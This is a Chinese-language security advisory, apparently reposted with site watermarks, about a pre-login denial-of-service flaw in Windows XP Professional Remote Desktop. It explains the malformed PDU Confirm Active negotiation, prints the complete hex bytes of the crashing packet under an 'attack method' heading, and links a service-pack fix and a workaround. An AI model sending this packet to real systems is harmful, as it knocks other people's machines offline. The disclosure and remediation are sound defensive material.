涉及程序:
Windows XP Professional Remote Desktop
描述:
Microsoft Windows XP 远程桌面 DoS 缺陷
详细:
Remote Desktop 是 Windows XP Professional 单用户远程桌面协议(Remote Desktop Protocol,简称RDP)服务程序。在当 Windows XP Professional 的远程桌面(Remote Desktop)即终端服务被启动时很容易遭到远程拒绝服务攻击。
在远程桌面协议启动时,客户端和服务器端会进行图形处理能力会话协商,发送的会话数据包中含有一个叫做 PDU Confirm Active 的数据单元,这个数据单元中有一个32字节的数据块允许客户端进行选项设置关闭程序所不支持的“drawing”指令。
在这里需要知道 Pattern BLT 指令是否被发送,在Windows 2000 Server中,关闭这个指令可以使服务端发送 bitmaps 指令来替代 Pattern BLT 指令。但是向 Windows XP Professional 递交 Pattern BLT 指令时,可使 Windows XP Professional 崩溃而重启,而且因为崩溃是在登录屏幕进行着色图案操作时发生的,所以攻击者在客户端进行拒绝服务攻击是无需登陆或验证的。经测试所有版本的RDP协议(RDP 4.0 ,5.0 和 5.1)均受此缺陷影响。
受影响系统:
网管网www_bitscn_com Microsoft Windows XP Professional
Microsoft Windows .NET Standard Server Beta 3
不受影响系统:
Microsoft Windows 2000 Server
攻击方法:
发送如下未加密的超长 PDU Confirm Active 数据包可使 Windows XP Professional 远程桌面系统崩溃:
c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01
4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00
00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00
58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00
2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00 <- was "2a 00 01 01"
00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00
00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00
00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00
08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
网管网www.bitscn.com 00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00
0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00
00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00
fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01
40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00
14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
00 0a 00 01
解决方案:
下载补丁:
http://www.microsoft.com/WindowsXP/pro/downloads/servicepacks/sp1/default.asp
临时解决方案:
* 禁止远程桌面服务:
控制面板(Control Panel)-->系统(System)-->远程(Remote)-->远程桌面(Remote Desktop)-->删除选项"允许用户远程连接到此计算机(Allow users to connect remotely to this computer)"
网管u家u.bitsCN.com
附加信息:
无
相关站点:
http://www.net-security.org/vuln.php?id=2058
评论加载中…
